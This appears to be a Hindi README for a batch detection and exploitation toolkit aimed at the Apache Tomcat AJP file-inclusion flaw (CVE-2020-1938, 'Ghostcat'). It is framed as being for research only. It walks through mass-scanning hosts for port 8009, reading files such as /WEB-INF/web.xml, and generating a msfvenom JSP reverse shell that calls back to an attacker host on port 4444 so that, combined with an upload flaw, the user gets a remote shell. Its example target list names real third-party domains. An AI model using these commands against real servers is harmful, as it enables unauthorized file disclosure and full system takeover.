
CVE-2020-1938 / CNVD-2020-1048 डिटेक्शन टूल्स
यह टूल केवल सुरक्षा अनुसंधान और आंतरिक स्व-निरीक्षण के लिए है। टूल का उपयोग करके अवैध हमले करना प्रतिबंधित है; परिणामों की जिम्मेदारी उपयोगकर्ता की होगी।
Apache Tomcat फ़ाइल समावेशन भेद्यता (CVE-2020-1938 / CNVD-2020-1048) बैच डिटेक्शन टूल।
यह प्रोजेक्ट Kit4y के प्रोजेक्ट के आधार पर संशोधित किया गया है।
जब ip.txt में केवल 1 डोमेन या आईपी होता है, तो threadCount 1 हो जाता है, जिससे प्रोग्राम वास्तव में नहीं चलता। थ्रेड्स की संख्या जाँचने के लिए कोड जोड़ा गया।
...
if threadCount == 1:
threadCount = 2
for i in range(0,threadCount-1):
...
self.stream = self.socket.makefile("rb", bufsize=0)
print("".join([d.data for d in data]))
if sys.version_info < (3, 0):
self.stream = self.socket.makefile("rb", bufsize=0)
else:
self.stream = self.socket.makefile("rb", buffering=None)
if sys.version_info < (3, 0):
print("".join([d.data for d in data]))
else:
print(b"".join([d.data for d in data]).decode("UTF-8"))
1. स्कैन किए जाने वाले डोमेन/आईपी को ip.txt में रखें, उदाहरण के लिए:
127.0.0.1
www.baidu.com
www.google.com
2. python threading-find-port-8009.py
ip.txt में मौजूद डोमेन/आईपी को स्कैन करके 8009 पोर्ट खुला होने वालों को ढूँढ़ें, और उन्हें जनरेट की गई 8009.txt में संग्रहीत करें।
3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py
8009.txt में से भेद्यता से मेल खाने वाले URL को फ़िल्टर करके vul.txt में रखें। अंत में vul.txt में मौजूद डोमेन ही भेद्यता वाले डोमेन हैं।
python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128
डिफ़ॉल्ट रूप से webapps के अंतर्गत ROOT पढ़ा जाता है। “/asdf” को “/test/asdf” में बदलने पर webapps के अंतर्गत test निर्देशिका की सामग्री तक पहुँचा जा सकता है।
t.perform_request('/asdf',attributes=[
यदि सर्वर में फ़ाइल अपलोड भेद्यता भी मौजूद है, तो नीचे दिया गया shell.txt अपलोड करें।
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt
“/asdf” को “/asdf.jsp” में बदलें। MSF शुरू करने के बाद PoC टूल का उपयोग करके शेल प्राप्त किया जा सकता है।
https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487